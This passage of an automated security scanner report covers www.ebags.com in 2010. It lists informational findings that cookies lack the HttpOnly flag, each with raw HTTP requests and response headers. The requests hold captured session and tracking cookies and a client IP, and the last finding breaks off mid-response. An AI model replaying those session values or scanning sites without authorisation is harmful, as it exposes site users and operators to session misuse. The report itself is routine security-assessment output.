Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:06:03 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:06:03 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69496


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.41. http://www.ebags.com/department/sale  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/sale

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/sale HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 86994


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.42. http://www.ebags.com/department/snow-and-skate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/snow-and-skate

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/snow-and-skate HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:31 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:31 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.43. http://www.ebags.com/department/sports-and-duffels  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/sports-and-duffels

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/sports-and-duffels HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:16 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:16 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 70551


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.44. http://www.ebags.com/department/travel-accessories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/travel-accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/travel-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:19 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:19 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 72376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.45. http://www.ebags.com/department/wallets-and-accessories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /department/wallets-and-accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /department/wallets-and-accessories HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:22 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:22 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69020


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.46. http://www.ebags.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/ HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:04:21 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D7C4E0%5C710F0A6ABDF; expires=Sun, 02-Jan-2011 14:04:21 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.47. http://www.ebags.com/help/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /help/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:58 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:03:58 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 47067


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.48. http://www.ebags.com/info/Compare/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/Compare/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /info/Compare/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:17:04 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1540

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm">here</a>.</h2>
</body></html>
<!-- SiteCatalyst code version: H.10. Copyright 1997-2007 Omniture, Inc
...[SNIP]...

3.49. http://www.ebags.com/info/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /info/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:18:00 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: /index.cfm
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:18:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1502

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.cfm">here</a>.</h2>
</body></html>
<!-- SiteCatalyst code version: H.10. Copyright 1997-2007 Omniture, Inc
...[SNIP]...

3.50. http://www.ebags.com/info/ratings/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /info/ratings/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /info/ratings/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Dec 2010 14:17:43 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Location: https://www.ebags.com/members/index.cfm?Fuseaction=my_ebags_login&destination=ratings&RequireCookie=yes&myebags=yes
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:17:43 GMT; path=/
Set-Cookie: CUSTOMERID=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1641

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.ebags.com/members/index.cfm?Fuseaction=my_ebags_login&amp;destination=ratings&amp;RequireCookie=yes&amp;m
...[SNIP]...

3.51. http://www.ebags.com/members/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /members/index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /members/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:02:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 14:02:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 45788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...

3.52. http://www.ebags.com/product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /product/baggallini/a-la-carte-bagg-medium-crinkle-nylon/107617?productid=1283460 HTTP/1.1
Host: www.ebags.com
Proxy-Connection: keep-alive
Referer: http://www.ebags.com/category/travel-accessories/20014443?ne=100
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=495108; CFTOKEN=39324650; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_campaign=BEC; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; RES_TRACKINGID=565817218041047; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; ACCT=guest; mbox=session#1293371743230-938821#1293373836|PC#1293371743230-938821.20#1294581576|check#true#1293372036; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822PRODUCTID=","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395","pv":5,"to":5,"c":"http://www.ebags.com/shoppingcart/index.cfm","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1293371974968}; s_cc=true; __cmbDomTm=0; RES_SESSIONID=777179002994671; ResonanceSegment=1; __cmbTpvTm=1150; fsr.a=1293371979601; s_sq=ebagsprod%3D%2526pid%253DCategory%252520%25253A%252520Sale%252520%25253A%252520Travel%252520Accessories%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.ebags.com%25252Fproduct%25252Fbaggallini%25252Fa-la-carte-bagg-medium-crinkle-nylon%25252F107617%25253Fproductid%25253D128346%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
